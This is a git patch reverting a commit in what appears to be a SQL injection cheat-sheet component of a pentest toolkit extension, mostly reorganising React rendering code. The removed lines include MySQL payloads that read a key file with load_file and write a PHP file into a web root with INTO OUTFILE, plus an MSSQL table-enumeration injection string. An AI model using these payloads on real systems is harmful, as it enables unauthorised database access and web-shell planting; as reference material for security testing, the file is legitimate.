From 82264acd6cf05ea9fb5199298dd33a451be73feb Mon Sep 17 00:00:00 2001 From: br00x <47902351+rb-x@users.noreply.github.com> Date: Sun, 25 Jun 2023 17:22:55 +0200 Subject: [PATCH] Revert "Insert Mysql File Insert and Read" --- .../components/web/SQLPage/SQLInjection.tsx | 370 +++++++++--------- 1 file changed, 175 insertions(+), 195 deletions(-) diff --git a/src/pages/popup/components/web/SQLPage/SQLInjection.tsx b/src/pages/popup/components/web/SQLPage/SQLInjection.tsx index c6d6a22..f468967 100644 --- a/src/pages/popup/components/web/SQLPage/SQLInjection.tsx +++ b/src/pages/popup/components/web/SQLPage/SQLInjection.tsx @@ -1,9 +1,12 @@ -import React from 'react'; +import React, { useState } from 'react'; import { Typography, Divider } from 'antd'; - const { Title, Paragraph, Text, Link } = Typography; -export default function SQLi () { + +/*************************************** */ + +export default function SQLInjection() { + const DbColumnNumber = [ { db_type: 'MySQL/MSSQL/PGSQL', @@ -19,17 +22,6 @@ export default function SQLi () { }, ] - const DbInsertAndReaderFile = [ - { - db_type: 'MySQL', - title: "'select load_file('/var/lib/mysql-files/key.txt');" - }, - { - db_type: 'MySQL', - title: `select 1,2,"",4 into OUTFILE 'C:/xampp/htdocs/back.php'` - } - ] - const DbVersionEnumeration = [ { db_type: 'MySQL/MSSQL', @@ -142,199 +134,187 @@ export default function SQLi () { title: "' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --" } ]; - return ( -
- - SQL Injection - - - SQL injection (SQLi) is an application security weakness that allows attackers to control an - application’s database letting them access or delete data, change an application’s data-driven behavior, - and do other undesirable things by tricking the application into sending unexpected SQL commands. - - -
- Number of column - {DbColumnNumber.map( ( k, i ) => { - return ( - <> - - {k.db_type} - - -
{k.title}
-
- - ); - } )} -
- -
- Read and Insert File - {DbInsertAndReaderFile.map( ( k, i ) => { - return ( - <> - - {k.db_type} - + /***************************** */ + return ( + <> +
+ + SQL Injection + + + SQL injection (SQLi) is an application security weakness that allows attackers to control an + application’s database letting them access or delete data, change an application’s data-driven behavior, + and do other undesirable things by tricking the application into sending unexpected SQL commands. + + +
+ Number of column + {DbColumnNumber.map((k, i) => { + return ( + <> + + {k.db_type} + + + +
{k.title}
+
+ + ); + })} +
+ +
+ Database enumeration + {DbVersionEnumeration.map((k, i) => { + return ( + <> + + {k.db_type} + + +
{k.title}
+
+ + ); + })} +
+ +
+ Tablename enumeration + {DbTableEnumeration.map((k, i) => { + return ( + <> + + {k.db_type} + + +
{k.title}
+
+ + ); + })} +
+ +
+ Column name enumeration + {DbColumnEnumeration.map((k, i) => { + return ( + <> + + {k.db_type} + + +
{k.title}
+
+ + ); + })} +
+ +
+ Column values concatenation + {DbColValueConcatenation.map((k, i) => { + return ( + <> + + {k.db_type} + + +
{k.title}
+
+ + ); + })} +
+ +
+ Conditional ( Error Based ) + {DbConditionalErrors.map((k, i) => { + return ( + <> + + {k.db_type} + + +
{k.title}
+
+ + ); + })} +
+ +
+ Time-Based + {TimeBased.map((k, i) => { + return (
{k.title}
- - ); - } )} -
- -
- Database enumeration - {DbVersionEnumeration.map( ( k, i ) => { - return ( - <> - - {k.db_type} - - -
{k.title}
-
- - ); - } )} -
- -
- Tablename enumeration - {DbTableEnumeration.map( ( k, i ) => { - return ( - <> - - {k.db_type} - - -
{k.title}
-
- - ); - } )} -
- -
- Column name enumeration - {DbColumnEnumeration.map( ( k, i ) => { - return ( - <> - - {k.db_type} - + ); + })} +
+ +
+ Generic Error Based Payloads + {DbConditionalErrors.map((k, i) => { + return ( + {k.db_type}
{k.title}
- - ); - } )} -
- -
- Column values concatenation - {DbColValueConcatenation.map( ( k, i ) => { - return ( - <> - - {k.db_type} - + ); + })} +
+ +
+ Authentication Based Payloads + {AuthBased.map((k, i) => { + return (
{k.title}
- - ); - } )} -
- -
- Conditional ( Error Based ) - {DbConditionalErrors.map( ( k, i ) => { - return ( - <> - - {k.db_type} - + ); + })} +
+ +
+ Order by and UNION Based Payloads + {OrderUnion.map((k, i) => { + return (
{k.title}
- - ); - } )} -
- -
- Time-Based - {TimeBased.map( ( k, i ) => { - return ( - -
{k.title}
-
- ); - } )} -
- -
- Generic Error Based Payloads - {DbConditionalErrors.map( ( k, i ) => { - return ( - - {k.db_type} -
{k.title}
-
- ); - } )} -
- -
- Authentication Based Payloads - {AuthBased.map( ( k, i ) => { - return ( - -
{k.title}
-
- ); - } )} -
- -
- Order by and UNION Based Payloads - {OrderUnion.map( ( k, i ) => { - return ( - -
{k.title}
-
- ); - } )} -
-
- ); + ); + })} +
+
) + + ) }